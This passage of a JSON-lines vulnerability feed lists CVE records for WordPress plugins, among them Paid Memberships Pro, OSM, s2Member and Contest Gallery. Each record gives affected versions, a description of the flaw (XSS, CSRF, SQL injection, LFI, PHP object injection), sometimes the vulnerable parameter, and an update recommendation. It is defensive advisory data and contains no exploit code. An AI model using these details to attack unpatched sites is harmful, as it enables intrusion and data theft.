\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f80c3b9-5148-42eb-9137-9c538184cda3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f80c3b9-5148-42eb-9137-9c538184cda3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5458","slug":"cits-support-svg-webp-media-upload","versionEndExcluding":"3.0","description":"The CITS Support svg, webp Media and TTF,OTF File Upload WordPress plugin before 3.0 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47d15f1c-b9ca-494d-be8f-63c30e92f9b8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47d15f1c-b9ca-494d-be8f-63c30e92f9b8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1407","slug":"paid-memberships-pro","versionImpact":"2.12.10","versionEndExcluding":"3.0","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to subscribe to, modify, or cancel membership for a user via a forged request granted they can trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46bcbd1-566d-4b21-84a1-f25e3df7ddc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46bcbd1-566d-4b21-84a1-f25e3df7ddc7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.10\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.10\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2893\",\"name\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2893\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2839\",\"name\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2839\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3058329%40paid-memberships-pro%2Ftrunk&old=3033153%40paid-memberships-pro%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3058329%40paid-memberships-pro%2Ftrunk&old=3033153%40paid-memberships-pro%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5005","slug":"autocomplete-location-field-contact-form-7","versionImpact":"2.0","versionEndExcluding":"3.0","description":"The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bfb174d4-7658-4883-a682-d06bda89ec44\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bfb174d4-7658-4883-a682-d06bda89ec44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0399","slug":" \timage-over-image-vc-extension","versionEndExcluding":"3.0","description":"The Image Over Image For WPBakery Page Builder WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/702d7bbe-93cc-4bc2-b41d-cb66e08c99a7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/702d7bbe-93cc-4bc2-b41d-cb66e08c99a7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3471","slug":"button-generation","versionImpact":"2.3.9","versionEndExcluding":"3.0","description":"The Button Generator  WordPress plugin before 3.0 does not have CSRF check in place when bulk deleting, which could allow attackers to make a logged in admin delete buttons via a CSRF attack","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3c282fb-81b8-48bf-8c18-8366ea8ad9af\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3c282fb-81b8-48bf-8c18-8366ea8ad9af\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9458","slug":"reservit-hotel","versionImpact":"2.1","versionEndExcluding":"3.0","description":"The Reservit Hotel WordPress plugin before 3.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1157d6ae-af8b-4508-97e9-b9e86f612550\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1157d6ae-af8b-4508-97e9-b9e86f612550\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9611","slug":"increase-upload-file-size-maximum-execution-time-limit","versionImpact":"2.0","versionEndExcluding":"3.0","description":"The Increase upload file size & Maximum Execution Time limit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c432dbe-8542-41de-966a-b2699d1685ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c432dbe-8542-41de-966a-b2699d1685ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166370%40increase-upload-file-size-maximum-execution-time-limit&new=3166370%40increase-upload-file-size-maximum-execution-time-limit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166370%40increase-upload-file-size-maximum-execution-time-limit&new=3166370%40increase-upload-file-size-maximum-execution-time-limit\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/increase-upload-file-size-maximum-execution-time-limit\\\/trunk\\\/library_default_puvox.php?rev=2589469#L8560\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/increase-upload-file-size-maximum-execution-time-limit\\\/trunk\\\/library_default_puvox.php?rev=2589469#L8560\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1274","slug":"pricing-tables-for-wpbakery-page-builder","versionEndExcluding":"3.0","description":"The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate some shortcode attributes before using them to generate paths passed to include function\/s, allowing any authenticated users such as subscriber to perform LFI attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/267acb2c-1a95-487f-a714-516de05d2b2f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/267acb2c-1a95-487f-a714-516de05d2b2f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0367","slug":"pricing-tables-for-wpbakery-page-builder","versionEndExcluding":"3.0","description":"The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7685af2-6034-49ea-93ef-4debe72689bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7685af2-6034-49ea-93ef-4debe72689bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3604","slug":"osm","versionImpact":"3","versionEndExcluding":"3","description":"The OSM \u2013 OpenStreetMap plugin for WordPress is vulnerable to SQL Injection via the 'tagged_filter' attribute of the 'osm_map_v3' shortcode in all versions up to, and including, 6.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8eebc67-e590-4d7f-8925-e5e5090cedf0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8eebc67-e590-4d7f-8925-e5e5090cedf0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8991","slug":"osm","versionImpact":"3","versionEndExcluding":"3","description":"The OSM \u2013 OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's osm_map and osm_map_v3 shortcodes in all versions up to, and including, 6.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839ecd06-9c74-4ddc-b455-26ec3e627889?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839ecd06-9c74-4ddc-b455-26ec3e627889?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm.php#L1120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm.php#L1120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox_v4.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox_v4.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wp-osm-plugin.hyumika.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wp-osm-plugin.hyumika.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157069\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157069\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4706","slug":"wpo365-login","versionImpact":"27.2","versionEndExcluding":"28.0","description":"The WordPress + Microsoft Office 365 \/ Azure AD | LOGIN plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pintra' shortcode in all versions up to, and including, 27.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 28.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602a8030-087b-459f-b649-b4116404cf3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602a8030-087b-459f-b649-b4116404cf3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090428\\\/wpo365-login\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090428\\\/wpo365-login\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36722","slug":"visualcomposer","versionEndExcluding":"27","description":"The Visual Composer plugin for WordPress is vulnerable to Cross-Site Scripting in versions up to, and including, 26.0 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts that execute in a victim's browser.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c476d9af-9060-4294-874a-86e550253d3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c476d9af-9060-4294-874a-86e550253d3b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-xss-vulnerabilities-fixed-in-wordpress-visual-composer-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-xss-vulnerabilities-fixed-in-wordpress-visual-composer-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10229\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10229\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-visual-composer-website-builder-multiple-cross-site-scripting-vulnerabilities-26-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-visual-composer-website-builder-multiple-cross-site-scripting-vulnerabilities-26-0\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7725","slug":"contest-gallery","versionImpact":"26.1.0","versionEndExcluding":"26.1.1","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal or Stripe, Social Share Buttons, OpenAI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the comment feature in all versions up to, and including, 26.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 26.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3334370%40contest-gallery%2Ftrunk&old=3333852%40contest-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3334370%40contest-gallery%2Ftrunk&old=3333852%40contest-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18003103-3a14-4cbc-8bed-87a8ab050308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18003103-3a14-4cbc-8bed-87a8ab050308?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6716","slug":"contest-gallery","versionImpact":"26.0.8","versionEndExcluding":"26.0.9","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal or Stripe, Social Share Buttons, OpenAI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'upload[1][title]' parameter in all versions up to, and including, 26.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 26.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3321912%40contest-gallery&new=3321912%40contest-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3321912%40contest-gallery&new=3321912%40contest-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54caaf5-f37b-4842-ab3d-8e37cbed58da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54caaf5-f37b-4842-ab3d-8e37cbed58da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1513","slug":"contest-gallery","versionImpact":"26.0.0.1","versionEndExcluding":"26.0.1","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal or Stripe, Social Share Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Name and Comment field when commenting on photo gallery entries in all versions up to, and including, 26.0.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 26.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245199%40contest-gallery&new=3245199%40contest-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245199%40contest-gallery&new=3245199%40contest-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5cf360-0163-4a7c-8979-ec89ec80ad62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5cf360-0163-4a7c-8979-ec89ec80ad62?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12562","slug":"s2member-pro","versionImpact":"241216","versionEndExcluding":"250214","description":"The s2Member Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 241216 via deserialization of untrusted input from the 's2member_pro_remote_op' vulnerable parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 250214, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65192fdb-86db-475a-8c61-4db922920cfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65192fdb-86db-475a-8c61-4db922920cfe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11376","slug":"s2member","versionImpact":"241216","versionEndExcluding":"250214","description":"The s2Member \u2013 Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 241114. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 250214, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/tags\\\/241114\\\/s2member.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/tags\\\/241114\\\/s2member.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240794%40s2member&new=3240794%40s2member&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240794%40s2member&new=3240794%40s2member&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5c8f46-a686-4b77-8a22-8dec92a96350?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5c8f46-a686-4b77-8a22-8dec92a96350?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1768","slug":"clever-fox","versionImpact":"25.2.0","versionEndExcluding":"25.2.1","description":"The Clever Fox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's info box block in all versions up to, and including, 25.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 25.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16af8724-595c-4daa-80bd-8125a32cc502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16af8724-595c-4daa-80bd-8125a32cc502?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6876","slug":"clever-fox","versionImpact":"25.2.0","versionEndExcluding":"25.2.1","description":"The Clever Fox \u2013 One Click Website Importer by Nayra Themes plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'clever-fox-activate-theme' function in all versions up to, and including, 25.2.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the active theme, including to an invalid value which can take down the site.","recommendation":"Update to version 25.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e1f94d9-8be6-4174-90a5-820c0207a2fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e1f94d9-8be6-4174-90a5-820c0207a2fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clever-fox\\\/trunk\\\/clever-fox.php#L539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clever-fox\\\/trunk\\\/clever-fox.php#L539\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8326","slug":"s2member","versionImpact":"241114","versionEndExcluding":"241216","description":"The s2Member \u2013 Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 241114 via the 'sc_get_details' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including user data and database configuration information, which can lead to reading, updating, or dropping database tables. The vulnerability was partially patched in version 241114.","recommendation":"Update to version 241216, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets-in.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets-in.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188157\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188157\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208315\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/410d4ab0-22dd-4993-afbf-ae6193b70977?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/410d4ab0-22dd-4993-afbf-ae6193b70977?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9240","slug":"redi-restaurant-reservation","versionImpact":"24.0902","versionEndExcluding":"24.1015","description":"The ReDi Restaurant Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 24.0902. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 24.1015, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb9fc87e-b376-49ce-ba69-5acef9deda4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb9fc87e-b376-49ce-ba69-5acef9deda4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php?rev=2988247#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php?rev=2988247#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167881\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167881\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php\",\"refsource\":\"\",\"tags\":[]}]"}
